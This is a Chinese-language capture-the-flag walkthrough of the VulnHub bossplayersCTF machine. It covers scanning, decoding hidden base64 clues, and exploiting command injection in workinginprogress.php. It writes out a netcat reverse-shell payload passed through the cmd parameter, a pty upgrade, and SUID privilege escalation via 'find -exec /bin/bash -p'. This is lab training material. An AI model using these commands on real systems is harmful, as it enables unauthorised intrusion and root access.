VulnHub 靶机系列之bossplayersCTF1

先下载靶机

靶机下载链接:

bossplayersCTF: 1 ~ VulnHub

https://download.vulnhub.com/bossplayers/bossplayersCTF.ova

收集信息

1.发现靶机ip

查看kali的ip

靶机要和kali在同一模式下(NAT)

靶机ip

        arp-scan --interface=eth0 --localnet  

2. 扫描端口

nmap -sS -sV -T4 -A -p- 192.168.239.17

发现一个80端口(网页打不开)还有一个22端口

3.对网站进行爆破

dirb http://192.168.239.17 

 发现三个目录

这个应该是一个加密的

难度级别:[*][][][][]

描述:您好!我为那些想要上手的人创建了极其简单的 CTF。掌握方法论,避免误入歧途!我希望你喜欢这个,最重要的是,请玩得开心!

您无权访问此服务器上的/server-status。

Apache/2.4.38 (Debian) 服务器位于 192.168.239.17 端口 80

发现三个目录好像都没有什么用

先把一个密钥解密一下

意思:在努力点,兄弟(也是没用的信息)

4.利用源代码查找有用信息

view-source:http://192.168.239.17/index.html 网页下发现密文

进行破解

解密出来还是密文 嵌套

经过两次出现了想要的东西

得出的应该可以进行访问的URL路径:

http://192.168.239.17/workinginprogress.php

利用漏洞-命令注入

修复访问的URL :

http://192.168.239.17/workinginprogress.php?cmd=whoami

进行id命令

进行pwd命令

uname- -a 查看内核版本

需要的信息的大部分都已经掌握

接下我们进行反弹shell

反弹shell

在kali机上监听

nc -lvp 4567

fne 

URL改为http://192.168.200.132/workinginprogress.php?cmd=nc -e /bin/bash 192.168.239.17 4567

得到shell后执行操作,发现和我们在浏览器修改传递参数得到的内容一致

┌──(root㉿kali)-[~]                                                                                                             
└─# nc -lvvp 4567                         
listening on [any] 4567 ...
192.168.239.17: inverse host lookup failed: Unknown host
connect to [192.168.239.13] from (UNKNOWN) [192.168.239.17] 37288
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
pwd
/var/www/html
uname -a
Linux bossplayers 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux

1.使用python命令转换成交互式shell

 python -c 'import pty;pty.spawn("/bin/bash")'

2.提权

find / -perm -u=s -type f 2>/dev/null

find . -exec /bin/bash -p \;

flat

破解密文   Y29uZ3JhdHVsYXRpb25zCg==

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值